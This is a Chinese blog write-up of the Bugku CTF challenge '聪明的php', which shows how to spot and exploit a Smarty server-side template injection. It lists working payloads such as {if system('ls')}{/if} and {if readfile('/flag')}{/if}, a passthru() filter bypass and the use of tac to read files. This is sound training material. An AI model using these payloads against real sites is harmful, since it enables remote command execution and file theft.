Bugku web 聪明的php

最新推荐文章于 2024-04-22 20:14:47 发布
最新推荐文章于 2024-04-22 20:14:47 发布
阅读量2.5k 收藏 9
点赞数 12
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49633310/article/details/114919263
版权

Bugku web 聪明的php

模板注入

在这里插入图片描述

打开题目

在这里插入图片描述得到提示,传递参数
随机传一个参数,得到源码
在这里插入图片描述在这地方卡了挺久的,发现smarty是个模板,测试一下是不是模板注入

**加粗样式**
在这里插入图片描述确实为smarty模板注入

常用payload
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if readfile('/flag')}{/if} 
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if} 
smarty中的{if}标签中可以执行php语句

审计代码发现过滤挺多函数的,查找笔记发现passthru()函数没过滤

在这里插入图片描述通过一层层目录跳跃发现了东西start.sh
在这里插入图片描述
cat被过滤了,可以同tac命令查看文件
在这里插入图片描述
审计代码

/usr/bin/tail -f /dev/null	
done
sleep 1000
do
while test "1" = "1"
export T=$RANDOM		# T随机生成数字
FLAG=not_flag
export FLAG=not_flag
chmod 444 /_$T
echo $FLAG > /_$T		# $Flag放入根目录下的_T文件下
T=$RANDOM
export T=$RANDOM
service apache2 start
#!/usr/bin/env bash

再看根目录发现_1009
在这里插入图片描述

查看文件得到flag
在这里插入图片描述

4ug3nst3rn
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
bugku--聪明PHP
m0_65766842的博客
03-28 336
Smarty库的注入
聪明php(Bugku)
m0_70347972的博客
09-22 459
输入cat命令直接查看文件中的flag
bugkuctf | 聪明php
菜鸡一枚
03-07 150
SSTI服务器端模板注入(Smarty模块)
BUGKU--web
lulu001128的博客
04-17 102
解题过程
聪明php
m_de_g的博客
09-19 2173
聪明php 一、解题思路 1.根据题目提示 2.那么我们直接使用随便传入一个参数 http://114.67.246.176:18387/?a=1 3.传入参数,一般情况下是文件包含,或者命令执行,而这道题目比较新颖,使用的是php模板注入 4.根据测试2*4=8,确定是smarty模板注入 测试phpinfo()函数 http://114.67.246.176:18387/?a={if phpinfo()}{/if} 5.真的是百密一疏,过滤了好多的函数,好在没有把passthru()函数过
使用php执行linux命令
janthinasnail的博客
06-14 1891
程序执行函数 escapeshellarg— 把字符串转码为可以在 shell 命令里使用的参数 escapeshellcmd— shell 元字符转义 exec— 执行一个外部程序 passthru— 执行外部程序并且显示原始输出 proc_close— 关闭由 proc_open 打开的进程并且返回进程退出码 proc_get_status— 获取由 proc_open...
bugku 聪明php
qq_52671379的博客
08-03 508
bugku 聪明php 题目 打开靶机地址 此处提示需要随意传入一个参数 随机传一个参数,得到源码 发现smarty是个模板,测试一下是不是模板注入 传值?a={{2*2}}测试是否执行 看到被执行了,非常奈斯 存在命令执行漏洞,过滤了不少函数,但看了一下,passthru没有被过滤 这个函数可以代替system() 1、more ./*|grep fla用来匹配当前目录下,文件内容里有fla的,直接输出文件内容 2、passthru替代system,more替代cat/ 3、more命令,功能类似 c
bugku-web-聪明php
qq_75121443的博客
04-02 746
直接查看这些文件,但是cat被过滤,所以不能使用linux命令,直接使用php函数进行查看。一定要注意,这里指定php代码时要将其用{}扩起来,表示这时php代码,不然执行不成功。再细看这些没有反馈的文件名,你说有没有可能这写没有反馈和后缀的名称,是一个个文件夹。反之接下来就是整体电脑文件的全部查询了,直到找到flag文件的存放位置。要想办法绕过过滤,让value中的恶意执行代码成功执行。因为这里对字段的过滤,带有file的都不行。挨个读取文件,有的文件没有回显,是空文件。选择show_source。
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
php开发工程师系统性教学】——Laravel框架(验证码)的配置和使用的保姆式教程
php优质创造者
04-21 1601
👨‍💻。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 462
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 651
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
Laravel 6 - 第十五章 验证器
逆旅岁月的博客
04-22 1397
用于验证输入数据是否符合特定规则的一个组件,Laravel 6 提供了一个简洁且强大的验证系统,可以轻松验证来自用户输入或其他来源的数据。
牛客NC233 加起来和为目标值的组合(四)【中等 DFS C++、Java、Go、PHP
最新发布
weixin_37991016的博客
04-22 195
代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可。* @param nums int整型一维数组。* @param target int整型。* @return int整型。
PHP定时任务框架taskPHP3.0学习记录5环境部署常见问题及解决方案
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
04-19 839
如果你在使用 PHP 代码时遇到了 “function popen is disabled” 的错误,这意味着 PHP 配置中禁用了 popen 函数的使用。在命令行中运行一个简单的 PHP 脚本,使用 extension_loaded(‘redis’) 来检查 Redis 扩展是否已加载。找到 disable_functions 指令,从该指令中移除 popen,保存文件并重启 web 服务器。当出现一下错误,说明php版本不支持,建议升级php版本,至少>5.6。
Bugku post
09-21
根据提供的引用内容,Bugku post是一个题目的要求,要求在两秒内提交一道很长的计算题答案,并且式子每次刷新都会变动。需要使用POST方式传入一个变量名为value的值。具体的解题步骤包括创建一个Python文件,导入requests库和re库,并且创建一个函数来处理POST请求和计算题答案。然后,使用循环来不断刷新题目,获取题目提示,并通过POST请求提交答案。最后,将提交的答案复制粘贴到提交框中完成题目的提交。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值